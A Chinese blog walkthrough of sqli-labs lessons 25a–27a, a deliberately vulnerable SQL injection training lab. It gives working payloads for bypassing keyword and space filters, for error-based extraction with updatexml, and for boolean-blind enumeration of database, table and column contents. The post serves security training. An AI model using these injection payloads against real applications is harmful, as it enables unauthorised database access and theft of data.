sqli-labs lesson25a-27a

已于 2023-03-25 14:41:13 修改
阅读量122 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: 数据库 sql mysql
于 2023-02-22 23:31:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129172784
版权

目录

1.lesson25a 双写and或or

2.lesson-26 使用()

3.lesson-26a()绕过空格

4.lesson-27 union双写select大小写混写

5.lesson-27a

1.lesson25a 双写and或or

过滤and和or

判断注入:

为整数型注入

?id=1 anandd 1=2

9a5c8bd0b9cf90744108ba35d7aa0a57.png

查数据库名:

?id=-1  union select 1,2,database()

51bb294e0d47c6f5c7971255aab2b616.png

2.lesson-26 使用()

过滤了很多-- +,#,、/**/,空白字符(空格),/,and,or

c21225c9198a4a2fb5feb8f197d18a57.png

判断注入:

为单引号注入

?id=1' anandd '1'='1

空格过滤了,可以使用%0a,%a0,%09,%0c,括号,/**/等

使用括号绕过,查数据库:

?id=1' ||updatexml(1,concat(0x7e,(select (database())),0x7e),1) ||  '1'='1

查数据表:

?id=1' ||updatexml(1,concat(0x7e,(select (group_concat(table_name))  from (infoorrmation_schema.tables) where (table_schema='security')),0x7e),1) ||  '1'='1

f08b194a694a74863cfad4ddb386b6eb.png

查数据列:

?id=1' ||updatexml(1,concat(0x7e,(select (group_concat(column_name))  from (infoorrmation_schema.columns) where (table_schema='security') anandd(table_name='users')),0x7e),1) ||  '1'='1

4c9370572c64f4b6c105bbd2804b3b81.png

3.lesson-26a()绕过空格

过滤了

db970a7baa50878fc62562348925c906.png

判断注入:

单引号括号注入

?id=1') aandnd ('

盲注时要注意注释符号,当注释选and '1'='1,虽然符号没闭合,也会出现内容

4d626fc5c37492d02ff2855485a06879.png

选and '

a0dce261a37126483d57eb09550180e8.png

选or'

03bda26a44f5986cf9114ca4feec5268.png

选or('

7ba0e9318c8149e629f05dee0c3e1d51.png

选or('1')=('1

5dbe455a72fa2377a2fe9df5fb3b2feb.png

当所有sql的注释符(-- +,#)被过滤时并且无报错,在使用盲注时只能一个一个的试了,看闭合后是否能出结果

当使用两个and时,推荐闭合符号类似and'1'='1

当用一个或没有and时,推荐闭合符号类似or '

关闭了报错,使用布尔盲注

判断数据库长度:

1')anandd(length(database())=8)||('

数据库第一个字母

?id=1')anandd(select (ascii(substr(database(),1,1)))=115)||('

第二个……

判断所有表的长度: 这里limit 0,1用不了,空格无法绕过

?id=1')anandd(select(length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where  (table_schema = 'security')))=29))||('

判断所有表的第二个字母: 第一个字符为~

?id=1')anandd(select(ascii(substr((select (group_concat(concat('~',table_name,'~')))from(infoorrmation_schema.tables)where(table_schema='security')),2,1)))=101)||('

第三个……

判断所有字段的长度:

/?id=1')anandd(select(length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where  (table_schema = 'security') anandd(table_name='emails')))=11))||('

判断emails表的第一个字段的第二个字符:

?id=1')anandd(select(ascii(substr((select (group_concat(concat('~',table_name,'~')))from(infoorrmation_schema.tables)where(table_schema='security')),2,1)))=105)||('

第三个……

判断emails表id的总长度:

?id=1')anandd(select(length((select (group_concat(id)) from (security.emails)))=15))||('

查emails表的id第一条数据第二个字符:

?id=1')anandd(select(ascii(substr((select(group_concat(concat('~',id,'~')))from(security.emails)),2,1)))=49)||('

第二条……

4.lesson-27 union双写select大小写混写

windows的union select联合查询没法做

判断注入类型:

单引号注入

查数据库:

?id=1' and (updatexml(1,concat(0x7e,(select (database())),0x7e),1))and'1'='1

a0bac7db7deb6cd86bd0eee53d3638bf.png

其他看26关

5.lesson-27a

过滤了

d785a55705e17ef1cdfcc66cdc42a01f.png

关闭报错为盲注

判断注入:

双引号注入

判断数据库长度:

?id=1" and(length(database())=8)||"

数据库第一个字母

?id=1"and(select (ascii(substr(database(),1,1)))=115)||"

参考26a

参考文章:

(34条消息) sqli-labs通关(less21~less30)_仙女象的博客-CSDN博客https://blog.csdn.net/elephantxiang/article/details/119855881

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-labs——lesson25(联合查询和报错注入,附各种sql万能密码)
weixin_62281892的博客
07-12 880
25
sqli-labs(27)
weixin_30901729的博客
05-28 428
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
sqli-labs/Less-27
m0_71299382的博客
11-20 364
sqli-labs第二十七关
SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第二十七关,SQLi-LABS Less-27,SQLi-LABS Less 27,SQLiLABS Less27SQLi Less 27
sqli-labs ————less -27(union、SELECT、绕过滤)
Fly_鹏程万里
05-19 1862
Less-27从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* ...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
(手工)【sqli-labs2727a】报错回显、布尔盲注、过滤后注入
07-13 789
SQL-报错、布尔、过滤】
sqlilabs less-27~27a
TA不懒,但还没有添加简介
07-20 281
sqlilabs less-27~27a
【redis】Spring之RedisTemplate配置与使用
05-30 340
转载:Spring之RedisTemplate配置与使用用过redis,但直接使用Jedis进行相应的交互操作,现在正好来看一下RedisTemplate是怎么实现的,以及使用起来是否更加便利。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1208
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
如何mysql数据导入到mongdb
codemami的博客
05-30 1249
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
行列视(RCV)能否在指定时间生成报表数据?
2401_83701843的博客
05-30 167
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 470
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
[解决]windows mysql8.0.x误删除root,解决办法
weixin_46626971的博客
05-29 185
b. 确保mysql安装路径下的data文件夹下的ibdata1文件有写入权限。,这在mysql8.0之后的版本已经不在试用了,所以改为输入。:a. 很多解决办法是输入。
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为“sqli-labs”的数据库,并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。 5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php,这将创建所需的数据库表和数据。 6. 访问http://localhost/sqli-labs-master/index.html,您将看到sqli-labs的主页。 7. 点击“Lessons”链接,您将看到一系列的SQL注入漏洞测试用例,您可以选择其中的一个进行测试。 8. 在测试用例页面中,您可以看到注入点和注入语句,您可以使用工具如SQLMap等进行注入测试。 希望这个安装教程对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值